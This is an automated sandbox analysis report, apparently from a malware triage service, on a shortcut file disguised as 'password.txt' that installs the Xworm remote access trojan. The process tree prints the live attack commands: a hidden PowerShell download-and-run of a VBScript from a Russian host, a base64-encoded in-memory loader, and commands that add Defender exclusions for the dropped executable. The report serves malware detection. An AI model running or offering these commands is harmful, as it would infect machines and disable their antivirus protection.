xworm | 3488fe12c3493039d9eddabf5fb04bf9bb3a54bcd591ab911857b602c85f2e66

General

Target

password.txt.lnk
Size

1KB
MD5

a8d941db4a8f2301c661abff9d0121fa
SHA1

df5ccb18e15bea95a0b9588cf113e4219b15fe22
SHA256

3488fe12c3493039d9eddabf5fb04bf9bb3a54bcd591ab911857b602c85f2e66
SHA512

1f945f0ffea07dae942cc218ea603d9e8a21921513380c71c6a8b81ec88a6d955f4dd8ef6ac966248c0983872ef6e9fd88d866e1387fedb72e77b12c437eed2c

Score

10^/10

Malware Config

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral4/memory/4972-47-0x00000000019A0000-0x00000000019B2000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1836	powershell.exe
3	2076	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe
1028	powershell.exe
4880	powershell.exe
1836	powershell.exe
1836	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4972	RegAAsm.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1836	powershell.exe
1836	powershell.exe
2076	powershell.exe
2076	powershell.exe
4880	powershell.exe
4880	powershell.exe
1028	powershell.exe
1028	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	4972	RegAAsm.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1068 wrote to memory of 5084	1068	cmd.exe	81
PID 1068 wrote to memory of 5084	1068	cmd.exe	81
PID 5084 wrote to memory of 1836	5084	cmd.exe	82
PID 5084 wrote to memory of 1836	5084	cmd.exe	82
PID 1836 wrote to memory of 1764	1836	powershell.exe	86
PID 1836 wrote to memory of 1764	1836	powershell.exe	86
PID 1764 wrote to memory of 2076	1764	WScript.exe	87
PID 1764 wrote to memory of 2076	1764	WScript.exe	87
PID 2076 wrote to memory of 4972	2076	powershell.exe	89
PID 2076 wrote to memory of 4972	2076	powershell.exe	89
PID 4972 wrote to memory of 4880	4972	RegAAsm.exe	90
PID 4972 wrote to memory of 4880	4972	RegAAsm.exe	90
PID 4972 wrote to memory of 1028	4972	RegAAsm.exe	92
PID 4972 wrote to memory of 1028	4972	RegAAsm.exe	92

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min powershell -windowstyle hidden -command "& {Invoke-WebRequest -Uri http://dvaverif.ru:3001/www/shared.vbs -OutFile C:\Users\Admin\AppData\Local\Temp\shared.vbs; Start-Process 'C:\Users\Admin\AppData\Local\Temp\shared.vbs'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "& {Invoke-WebRequest -Uri http://dvaverif.ru:3001/www/shared.vbs -OutFile C:\Users\Admin\AppData\Local\Temp\shared.vbs; Start-Process 'C:\Users\Admin\AppData\Local\Temp\shared.vbs'}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\shared.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAGEAeQBsAG8AYQBkAFwAKQAuAFAAYQB5AGwAbwBhAGQAKQA7ACAAJAB0AGUAeAB0ACAAPQAgAC0AagBvAGkAbgAgACQAdABlAHgAdABbAC0AMQAuAC4ALQAkAHQAZQB4AHQALgBMAGUAbgBnAHQAaABdADsAIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAZQB4AHQAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABOAHUAbABsACwAJABOAHUAbABsACkAOwA=
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2076
      - C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegAAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
aa0a32b11dca7b04f4cc5fe8c55cb357

SHA1
00e354fd0754a7d721a270cdc08f970b9a3f6605

SHA256
e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

SHA512
1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4bbeb446e9fd83e350822dada9dbb5e

SHA1
e05bf244c928a483af86845622836a4255621a60

SHA256
6cc9de80064adeb56e0ee65e69e5e85d4157d4b42a221244f81d1d75ec980df9

SHA512
58eb9e09fdc65cc0b3ea4593908edc36b6c6682a12bba07a1fc3a2fd22679e14fcc5d9944fe4567c1c3174d11d1bfce99b7d34dd22ac1064d4e212212e933c8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05c670989a4cec41ac92523c1a87528a

SHA1
c45ec094550e119ff2b58498d72aa1e8db5e7a2f

SHA256
d7f4d3580b946be91f6ffd716b427a08a0f9584b5b42162f561087a85e10501e

SHA512
2cba0c173d9265d40ab37d28287f377d4c61b800882dfa07e52d8dc84685db11b35e1311918abbb3a3b075fb3f2cccbe153daeb6405626c53ecdd8a82de8aee8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe

Filesize
236KB

MD5
7f23b18896c52fa40ad0d9b388e6e951

SHA1
de043868063b6bf974fcadba147d780f072f1840

SHA256
4953d68d68bf137417321bbfc3b7207ee6b2eab0c9600be88bdd3501961ea137

SHA512
33d2f5538678d242490315d9fd622d3a7cd27e82547f7301e1a39780fe1503607fe34a82364115da3a390146dec026d63d8aa5ae5e367c78d5530f9068ea28f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnlb5j2g.n2r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\shared.vbs

Filesize
2.3MB

MD5
634eb9320cb4f68904ae3b1a7f79e618

SHA1
774cd24cdd4f048a2a8c8e922e7a4d38fd3189b0

SHA256
4b056176eff38ea62624a06c424eb2ff021a616c884295d4b79366c1dc2aa066

SHA512
3dc169aa442a40bfffca11f83e50424eddb19f3a81a0a7546567025ce7d8e9c7f53fedd39a5a4b9db83c07ff8067b6a540a294a1cd22f0457c06ed0fc55afd48

Download Submit
memory/1836-13-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

Filesize
10.8MB

Download
memory/1836-21-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

Filesize
10.8MB

Download
memory/1836-14-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

Filesize
10.8MB

Download
memory/1836-2-0x00007FFE1E333000-0x00007FFE1E335000-memory.dmp

Filesize
8KB

Download
memory/1836-12-0x00007FFE1E330000-0x00007FFE1EDF2000-memory.dmp

Filesize
10.8MB

Download
memory/1836-11-0x00000138C5140000-0x00000138C5162000-memory.dmp

Filesize
136KB

Download
memory/2076-31-0x00000297F32B0000-0x00000297F32F6000-memory.dmp

Filesize
280KB

Download
memory/2076-32-0x00000297F3270000-0x00000297F3294000-memory.dmp

Filesize
144KB

Download
memory/4972-44-0x0000000000F60000-0x0000000000FA2000-memory.dmp

Filesize
264KB

Download
memory/4972-45-0x00000000016B0000-0x00000000016FC000-memory.dmp

Filesize
304KB

Download
memory/4972-46-0x0000000001700000-0x0000000001706000-memory.dmp

Filesize
24KB

Download
memory/4972-47-0x00000000019A0000-0x00000000019B2000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing